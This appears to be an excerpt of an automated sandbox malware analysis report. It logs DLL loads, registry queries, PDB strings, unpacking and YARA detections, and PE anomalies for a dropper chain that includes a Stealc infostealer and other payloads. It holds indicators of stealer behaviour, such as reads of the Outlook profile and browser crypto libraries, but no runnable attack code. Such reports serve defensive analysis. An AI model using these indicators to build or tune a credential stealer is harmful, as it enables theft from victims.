Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: iphlpapi.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1910272 > 1048576

Source: file.exe

Static PE information: Raw size of iknsbfcc is bigger than: 0x100000 < 0x1a0c00

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 0000000E.00000002.2928542636.000000006BCDF000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: gold.exe, 00000013.00000002.2767640361.000000000050C000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: gold.exe, 00000013.00000002.2806606580.000000000465F000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2806606580.0000000004802000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2819140409.0000000005E30000.00000004.10000000.00040000.00000000.sdmp, gold.exe, 00000013.00000002.2774776253.0000000003886000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: gold.exe, 00000013.00000002.2806606580.000000000465F000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2806606580.0000000004802000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2819140409.0000000005E30000.00000004.10000000.00040000.00000000.sdmp, gold.exe, 00000013.00000002.2774776253.0000000003886000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: gold.exe, 00000013.00000002.2806606580.0000000004788000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2806606580.0000000004595000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2817662633.0000000005D60000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 0000000E.00000002.2928542636.000000006BCDF000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: OFF011F112LUQGJPCDB24W.exe, 00000025.00000002.3108575283.0000000000F22000.00000040.00000001.01000000.00000021.sdmp, OFF011F112LUQGJPCDB24W.exe, 00000025.00000003.3042907267.0000000004840000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: protobuf-net.pdb source: gold.exe, 00000013.00000002.2806606580.0000000004788000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2806606580.0000000004595000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2817662633.0000000005D60000.00000004.10000000.00040000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.570000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iknsbfcc:EW;rwdyrkuv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iknsbfcc:EW;rwdyrkuv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.260000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iknsbfcc:EW;rwdyrkuv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iknsbfcc:EW;rwdyrkuv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 3.2.axplong.exe.260000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iknsbfcc:EW;rwdyrkuv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iknsbfcc:EW;rwdyrkuv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 7.2.axplong.exe.260000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iknsbfcc:EW;rwdyrkuv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iknsbfcc:EW;rwdyrkuv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Unpacked PE file: 19.2.gold.exe.3b0000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Unpacked PE file: 36.2.d0d468f327.exe.240000.0.unpack :EW;.rsrc :W;.idata :W;nnxuuolc:EW;fjnjtzun:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;nnxuuolc:EW;fjnjtzun:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Unpacked PE file: 37.2.OFF011F112LUQGJPCDB24W.exe.f20000.0.unpack :EW;.rsrc:W;.idata :W;qpgdxncw:EW;menimhwp:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Unpacked PE file: 43.2.4ad48d7d65.exe.440000.0.unpack :EW;.rsrc :W;.idata :W; :EW;hbhagroj:EW;weowoivy:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;hbhagroj:EW;weowoivy:EW;.taggant:EW;

Yara detected Costura Assembly Loader

Source: Yara match	File source: 19.2.gold.exe.5ce0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.gold.exe.4884c20.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2813225946.0000000005CE0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2806606580.0000000004802000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gold.exe PID: 2612, type: MEMORYSTR

Source: random[1].exe.7.dr

Static PE information: 0x9C4597AB [Wed Jan 29 23:35:07 2053 UTC]

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 14_2_00CB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

14_2_00CB9860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: ofHIebp8us.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x5a3f6
Source: 13a34faa3c.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x86b26
Source: random[1].exe1.7.dr	Static PE information: real checksum: 0x1d2471 should be: 0x1d0a31
Source: myrdx.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x84901
Source: stealc_default2.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x516aa
Source: 4ad48d7d65.exe.7.dr	Static PE information: real checksum: 0x1d2471 should be: 0x1d0a31
Source: Cd0bGrjt9g.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x5ac43
Source: random[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x86b26
Source: 84d15ff2c9.exe.7.dr	Static PE information: real checksum: 0x1d2471 should be: 0x1d0a31
Source: random[1].exe2.7.dr	Static PE information: real checksum: 0x2dff88 should be: 0x2da66b
Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1d75be should be: 0x1dbc30
Source: myrdx[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x84901
Source: 03564c0e08.exe.7.dr	Static PE information: real checksum: 0x2dff88 should be: 0x2da66b
Source: random[1].exe0.7.dr	Static PE information: real checksum: 0x2e86a0 should be: 0x2e57e2
Source: file.exe	Static PE information: real checksum: 0x1d75be should be: 0x1dbc30
Source: stealc_default2[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x516aa
Source: d0d468f327.exe.7.dr	Static PE information: real checksum: 0x2e86a0 should be: 0x2e57e2
Source: 25e6c25320.exe.7.dr	Static PE information: real checksum: 0x2dff88 should be: 0x2da66b

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: iknsbfcc
Source: file.exe	Static PE information: section name: rwdyrkuv
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: iknsbfcc
Source: axplong.exe.0.dr	Static PE information: section name: rwdyrkuv
Source: axplong.exe.0.dr	Static PE information: section name: .taggant
Source: 03564c0e08.exe.7.dr	Static PE information: section name:
Source: 03564c0e08.exe.7.dr	Static PE information: section name: .rsrc
Source: 03564c0e08.exe.7.dr	Static PE information: section name: .idata
Source: 03564c0e08.exe.7.dr	Static PE information: section name: vizvkyid
Source: 03564c0e08.exe.7.dr	Static PE information: section name: ekdkgglk
Source: 03564c0e08.exe.7.dr	Static PE information: section name: .taggant
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.7.dr	Static PE information: section name: .idata
Source: random[1].exe0.7.dr	Static PE information: section name: nnxuuolc
Source: random[1].exe0.7.dr	Static PE information: section name: fjnjtzun
Source: random[1].exe0.7.dr	Static PE information: section name: .taggant
Source: d0d468f327.exe.7.dr	Static PE information: section name:
Source: d0d468f327.exe.7.dr	Static PE information: section name: .rsrc
Source: d0d468f327.exe.7.dr	Static PE information: section name: .idata
